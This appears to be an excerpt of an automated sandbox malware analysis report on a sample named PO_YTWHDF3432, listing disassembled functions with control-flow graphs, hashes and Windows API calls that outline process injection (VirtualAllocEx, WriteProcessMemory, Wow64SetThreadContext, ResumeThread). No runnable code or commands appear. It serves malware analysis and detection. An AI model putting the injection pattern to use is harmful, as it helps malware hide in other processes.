                                                                          control_flow_graph 1097 4e7b490-4e7b49f 1098 4e7b4a1-4e7b4ae call 4e7a00c 1097->1098 1099 4e7b4cb-4e7b4cf 1097->1099 1106 4e7b4c4 1098->1106 1107 4e7b4b0 1098->1107 1100 4e7b4e3-4e7b524 1099->1100 1101 4e7b4d1-4e7b4db 1099->1101 1108 4e7b526-4e7b52e 1100->1108 1109 4e7b531-4e7b53f 1100->1109 1101->1100 1106->1099 1152 4e7b4b6 call 4e7b728 1107->1152 1153 4e7b4b6 call 4e7b718 1107->1153 1108->1109 1110 4e7b563-4e7b565 1109->1110 1111 4e7b541-4e7b546 1109->1111 1113 4e7b568-4e7b56f 1110->1113 1114 4e7b551 1111->1114 1115 4e7b548-4e7b54f call 4e7a018 1111->1115 1112 4e7b4bc-4e7b4be 1112->1106 1116 4e7b600-4e7b6c0 1112->1116 1117 4e7b571-4e7b579 1113->1117 1118 4e7b57c-4e7b583 1113->1118 1119 4e7b553-4e7b561 1114->1119 1115->1119 1147 4e7b6c2-4e7b6c5 1116->1147 1148 4e7b6c8-4e7b6f3 GetModuleHandleW 1116->1148 1117->1118 1121 4e7b585-4e7b58d 1118->1121 1122 4e7b590-4e7b599 call 4e7a028 1118->1122 1119->1113 1121->1122 1128 4e7b5a6-4e7b5ab 1122->1128 1129 4e7b59b-4e7b5a3 1122->1129 1130 4e7b5ad-4e7b5b4 1128->1130 1131 4e7b5c9-4e7b5d6 1128->1131 1129->1128 1130->1131 1133 4e7b5b6-4e7b5c6 call 4e7a038 call 4e7b07c 1130->1133 1137 4e7b5f9-4e7b5ff 1131->1137 1138 4e7b5d8-4e7b5f6 1131->1138 1133->1131 1138->1137 1147->1148 1149 4e7b6f5-4e7b6fb 1148->1149 1150 4e7b6fc-4e7b710 1148->1150 1149->1150 1152->1112 1153->1112
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: a59ddc3a70fadb5dce4554e23e5b3f1a9d1c327ed0f711fb9deac4c3953c6242
                                                                          • Instruction ID: e25b19db2d987ba2a138481b622f5d427424e25e8eee6989c66364465a133f36
                                                                          • Opcode Fuzzy Hash: a59ddc3a70fadb5dce4554e23e5b3f1a9d1c327ed0f711fb9deac4c3953c6242
                                                                          • Instruction Fuzzy Hash: 58711270A00B058FEB24DF2AD04075ABBF6FF88718F108929D48AD7A50E775F949CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04E7590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1154 4e7590c-4e75913 1155 4e7591c-4e759d9 CreateActCtxA 1154->1155 1157 4e759e2-4e75a3c 1155->1157 1158 4e759db-4e759e1 1155->1158 1165 4e75a3e-4e75a41 1157->1165 1166 4e75a4b-4e75a4f 1157->1166 1158->1157 1165->1166 1167 4e75a51-4e75a5d 1166->1167 1168 4e75a60 1166->1168 1167->1168 1170 4e75a61 1168->1170 1170->1170
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 04E759C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 795e1a6e9ac6e169672f19a554773c8c689ccba63570fb23dc0c3ed1059d49da
                                                                          • Instruction ID: 2ea761e689830b4470806c1302f69cc4b3de4618cc5c969a3fa00d5fa30d8867
                                                                          • Opcode Fuzzy Hash: 795e1a6e9ac6e169672f19a554773c8c689ccba63570fb23dc0c3ed1059d49da
                                                                          • Instruction Fuzzy Hash: 6D41E2B1D0171DCBEB24DFA9C884BDDBBB5BF48314F20806AD408AB251DBB56986CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04E7449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1171 4e7449c-4e759d9 CreateActCtxA 1174 4e759e2-4e75a3c 1171->1174 1175 4e759db-4e759e1 1171->1175 1182 4e75a3e-4e75a41 1174->1182 1183 4e75a4b-4e75a4f 1174->1183 1175->1174 1182->1183 1184 4e75a51-4e75a5d 1183->1184 1185 4e75a60 1183->1185 1184->1185 1187 4e75a61 1185->1187 1187->1187
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 04E759C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 867453c74601b0eda0ddf53490fb18722b8d595f34ce68864e1c8bf714c172b4
                                                                          • Instruction ID: a400cee9a58cd35459ac1d3182fd46994e5aa7d02cbe07ac5aed5c396921dbab
                                                                          • Opcode Fuzzy Hash: 867453c74601b0eda0ddf53490fb18722b8d595f34ce68864e1c8bf714c172b4
                                                                          • Instruction Fuzzy Hash: 5841E370D0171DDBEB24DFA9C844BDDBBB5BF49314F20806AD408AB251DBB56946CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D14B8 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1188 49d14b8-49d150e 1191 49d151e-49d155d WriteProcessMemory 1188->1191 1192 49d1510-49d151c 1188->1192 1194 49d155f-49d1565 1191->1194 1195 49d1566-49d1596 1191->1195 1192->1191 1194->1195
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 049D1550
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 91a423ef2811c1c80570354c022ea38a62397f47133059cd3102ccdadbf68f5e
                                                                          • Instruction ID: 46d63d95444d857a757c49a60103fd557e43961a339e55c4eff8f61aebf19911
                                                                          • Opcode Fuzzy Hash: 91a423ef2811c1c80570354c022ea38a62397f47133059cd3102ccdadbf68f5e
                                                                          • Instruction Fuzzy Hash: 18214872D003099FDB14CFAAC881BDEBBF5FF48320F108429E919A7240D778A955CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D14C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1210 49d14c0-49d150e 1212 49d151e-49d155d WriteProcessMemory 1210->1212 1213 49d1510-49d151c 1210->1213 1215 49d155f-49d1565 1212->1215 1216 49d1566-49d1596 1212->1216 1213->1212 1215->1216
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 049D1550
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 6190f3f326b59bc048f35a841a7138f226589b045a70dcaca6d1bba749f9faf8
                                                                          • Instruction ID: 8c6a0502fab02996930aac2a0ac0eed5bdb3dddaa97402d6678087ffaa69d2fb
                                                                          • Opcode Fuzzy Hash: 6190f3f326b59bc048f35a841a7138f226589b045a70dcaca6d1bba749f9faf8
                                                                          • Instruction Fuzzy Hash: F4212772D003499FDB14DFAAC881BDEBBF5FF48310F148429E919A7240C778A954CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D10C0 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1199 49d10c0-49d1113 1202 49d1115-49d1121 1199->1202 1203 49d1123-49d1153 Wow64SetThreadContext 1199->1203 1202->1203 1205 49d115c-49d118c 1203->1205 1206 49d1155-49d115b 1203->1206 1206->1205
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 049D1146
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 65485a466530fcbddf05c0abadf604da948c3d6daa82f6893b9e8e0e45a07d6e
                                                                          • Instruction ID: 401c4613d13fb44b01911883d3d76e20acc686aa404987da9e20428fa8097372
                                                                          • Opcode Fuzzy Hash: 65485a466530fcbddf05c0abadf604da948c3d6daa82f6893b9e8e0e45a07d6e
                                                                          • Instruction Fuzzy Hash: EF217C72D003098FDB14DFAAC481BEEBBF4EF49324F248429D419A7241CB78A945CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D15A9 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1220 49d15a9-49d163d ReadProcessMemory 1224 49d163f-49d1645 1220->1224 1225 49d1646-49d1676 1220->1225 1224->1225
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 049D1630
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 234523df1df47ebf000387851dd22429ec41035201b785c05e96227b4d885b4d
                                                                          • Instruction ID: 061eb92e1205eb9265cb4c3b9d05d0afa21b105c62403ef9bb06f9911e29882a
                                                                          • Opcode Fuzzy Hash: 234523df1df47ebf000387851dd22429ec41035201b785c05e96227b4d885b4d
                                                                          • Instruction Fuzzy Hash: FA212A71D003499FDB14DFAAC881BEEBBF5FF48310F548429E958A7250C7789941CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04E7B470 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1229 4e7b470-4e7db1c DuplicateHandle 1231 4e7db25-4e7db42 1229->1231 1232 4e7db1e-4e7db24 1229->1232 1232->1231
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04E7D646,?,?,?,?,?), ref: 04E7DB0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 01ee2fdfa114d76ea36d838886ad3cfc3e43ed4a5d2956cc99823e93e36172e6
                                                                          • Instruction ID: fa7fd037fdffed2d88940ba3321ab29240ecac5906ca44ab1dcd06d5209c71da
                                                                          • Opcode Fuzzy Hash: 01ee2fdfa114d76ea36d838886ad3cfc3e43ed4a5d2956cc99823e93e36172e6
                                                                          • Instruction Fuzzy Hash: AC21E3B59003089FDB10CFAAD984AEEBBF4EB48320F14801AE914A7350D374A950CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D15B0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1245 49d15b0-49d163d ReadProcessMemory 1248 49d163f-49d1645 1245->1248 1249 49d1646-49d1676 1245->1249 1248->1249
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 049D1630
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: a061cb97d952899d52ff4d93e53c5f17477590ee902552a7f91e5953bf417825
                                                                          • Instruction ID: 9fea72e91f2dc2ebce788175686f3b0741ceeea87b4f13766931d49a0edbf61b
                                                                          • Opcode Fuzzy Hash: a061cb97d952899d52ff4d93e53c5f17477590ee902552a7f91e5953bf417825
                                                                          • Instruction Fuzzy Hash: BC212871D003499FDB10DFAAC881BEEBBF5FF48310F548429E918A7240C778A941CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D10C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1235 49d10c8-49d1113 1237 49d1115-49d1121 1235->1237 1238 49d1123-49d1153 Wow64SetThreadContext 1235->1238 1237->1238 1240 49d115c-49d118c 1238->1240 1241 49d1155-49d115b 1238->1241 1241->1240
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 049D1146
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: d4f0d70496f86e827a2a4242bffdac4ae6fe92a5f29eec15cb208543dce3c4a3
                                                                          • Instruction ID: 137ef70b666898a8a09764e6e9933cf356539b119d541d9c3313bbe15731d5a4
                                                                          • Opcode Fuzzy Hash: d4f0d70496f86e827a2a4242bffdac4ae6fe92a5f29eec15cb208543dce3c4a3
                                                                          • Instruction Fuzzy Hash: 53215B72D003098FDB14DFAAC485BEEBBF4EF49320F148429D419A7241CB78A945CFA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D13F8 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1253 49d13f8-49d147b VirtualAllocEx 1256 49d147d-49d1483 1253->1256 1257 49d1484-49d14a9 1253->1257 1256->1257
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 049D146E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: e3c57b23a5abed690186415043f7c8323587bf4a9b318dfd8c366499389b0615
                                                                          • Instruction ID: 3a3f2a6c20ebdc7502e5a2c976df8a0948e8d7a5d10ef03291a8acf0454749af
                                                                          • Opcode Fuzzy Hash: e3c57b23a5abed690186415043f7c8323587bf4a9b318dfd8c366499389b0615
                                                                          • Instruction Fuzzy Hash: CB116A769003089FDB24DFAAC841BDFBBF5EF48320F248419E415A7250C775A941CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04E7B900 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1261 4e7b900-4e7b948 1263 4e7b950-4e7b97f LoadLibraryExW 1261->1263 1264 4e7b94a-4e7b94d 1261->1264 1265 4e7b981-4e7b987 1263->1265 1266 4e7b988-4e7b9a5 1263->1266 1264->1263 1265->1266
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04E7B761,00000800,00000000,00000000), ref: 04E7B972
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: c1698479a792d0de691ce6cfe9fb15fe84f2de8f0bd48f51672e320752f231bd
                                                                          • Instruction ID: 55df203090c9b3f4d5ab7bc03afde9b6788b8fa40f5c31f7bde12bc1921c7f58
                                                                          • Opcode Fuzzy Hash: c1698479a792d0de691ce6cfe9fb15fe84f2de8f0bd48f51672e320752f231bd
                                                                          • Instruction Fuzzy Hash: 0E1126B6D003098FDB14CF9AD444BDEFBF4EB48324F10842AD869A7201C379A546CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D1010 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 10b80315dc69fae4eb087a0d8c25382399e2a0c6abb96871f5b789cb6ac7f401
                                                                          • Instruction ID: 3fa6f0cbcb2cff78addb5ce66ea322bbf7af41d5562fd60d79bf057963ac2e5b
                                                                          • Opcode Fuzzy Hash: 10b80315dc69fae4eb087a0d8c25382399e2a0c6abb96871f5b789cb6ac7f401
                                                                          • Instruction Fuzzy Hash: 58117975D003488FDB24DFAAD4457EEBBF9EF88224F248419D419A7240CB796841CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04E7B0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04E7B761,00000800,00000000,00000000), ref: 04E7B972
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 2762a4c4c40cbb84ff6df8ec0d7bdbb942419c95fbecc7eabe22bf430d490287
                                                                          • Instruction ID: 2e899a7e96b0865f23cf201346e53891abaaa2758bbd46e529c0848528321217
                                                                          • Opcode Fuzzy Hash: 2762a4c4c40cbb84ff6df8ec0d7bdbb942419c95fbecc7eabe22bf430d490287
                                                                          • Instruction Fuzzy Hash: 241126B6D003099FDB14CF9AD444BDEFBF4EB88324F10842AD829A7201C3B5A945CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04E7A00C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,04E7B4AC), ref: 04E7B6E6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 5357189ab371ab65976d9d6c6ee0a2016161dba06993bfa081e82bcb20412cc0
                                                                          • Instruction ID: a700f195dcb26bb33d6019864e62ddfbd9794eef4a14651072017930ee6255b1
                                                                          • Opcode Fuzzy Hash: 5357189ab371ab65976d9d6c6ee0a2016161dba06993bfa081e82bcb20412cc0
                                                                          • Instruction Fuzzy Hash: 2811E2B5D003498FDB20DF9AD444BDEBBF4AB89224F10881AD919B7210D375A545CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D1018 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 86e0d1e583847481db4fa4a66b2590d110c0f7f64aa4f8b69829792972e17fdc
                                                                          • Instruction ID: 5f032acfd1b51f67e50130c7a4f8b48e74851bb3751bb72b72983cfb60005183
                                                                          • Opcode Fuzzy Hash: 86e0d1e583847481db4fa4a66b2590d110c0f7f64aa4f8b69829792972e17fdc
                                                                          • Instruction Fuzzy Hash: A1115875D003488FDB24DFAAC4457EEFBF5EB88320F248429C419A7240CB79A940CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D2889 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 049D28ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 698804768fa99a9067ea2a4e2f540486788e8f17794053f23cd5af1c0163f37f
                                                                          • Instruction ID: 3551caddf8c42a492c85b787a362e873471949793d2a3b05dd4ca5b25398ecc4
                                                                          • Opcode Fuzzy Hash: 698804768fa99a9067ea2a4e2f540486788e8f17794053f23cd5af1c0163f37f
                                                                          • Instruction Fuzzy Hash: 311103B59003498FDB20DF99D944BEEBBF8FB58320F24845AE858A7210C375A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 049D2890 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 049D28ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: bd357d0f0332017676ee34772911a05e514d4ea6ad0db9d762b1f3d889f7acb6
                                                                          • Instruction ID: ed14b90f27fa01fa1dc637706980d634f2c3cd2b8e94598a5246a73df6aa4fdf
                                                                          • Opcode Fuzzy Hash: bd357d0f0332017676ee34772911a05e514d4ea6ad0db9d762b1f3d889f7acb6
                                                                          • Instruction Fuzzy Hash: 5111E5B59003499FDB20DF9AD945BDEFBF8FB48320F208459D958A7200D375A944CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A58B38 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: m
                                                                          • API String ID: 0-3775001192
                                                                          • Opcode ID: 7b05b17e41dd606a4de9c7293086865f124a6f584b1cf7976a96d561eccd7843
                                                                          • Instruction ID: 49fcc754f4b71ce95fabc6bf5140d0ffdce9dfb73baf873ab0f7fd87b2c59454
                                                                          • Opcode Fuzzy Hash: 7b05b17e41dd606a4de9c7293086865f124a6f584b1cf7976a96d561eccd7843
                                                                          • Instruction Fuzzy Hash: D7514AA2A0E7A55FD702DB348C6179B7FA49F53201F0940EBC895CB693E5748889C3B7
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A582E0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: '
                                                                          • API String ID: 0-1997036262
                                                                          • Opcode ID: 33de224791d3074777ad5807b1bcaa8fe8b17680e368e8fecf3594f72f20ab46
                                                                          • Instruction ID: 37dd6bbba342d9822b22889bf905670e71837209544ee8433d48448cb6ed3004
                                                                          • Opcode Fuzzy Hash: 33de224791d3074777ad5807b1bcaa8fe8b17680e368e8fecf3594f72f20ab46
                                                                          • Instruction Fuzzy Hash: E7318171A04229CBCB108FA9D84077FB7B4EB49B22F144577EC15DB685E37C9981C7A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A5FCC8 Relevance: .4, Instructions: 446COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da33ede608b64d3da752e53e675aaa1a3e73e76c9540afa87a4bda896445df23
                                                                          • Instruction ID: ebcc824697164a5be63ebd0015ed6493891a03df5bd19c268f9fdf0b1819ad22
                                                                          • Opcode Fuzzy Hash: da33ede608b64d3da752e53e675aaa1a3e73e76c9540afa87a4bda896445df23
                                                                          • Instruction Fuzzy Hash: 32416E32B01109DFCB04DF6CD894BAEB7B2BF882497258429ED05EB758DE30ED428B50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A5AF38 Relevance: .3, Instructions: 332COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
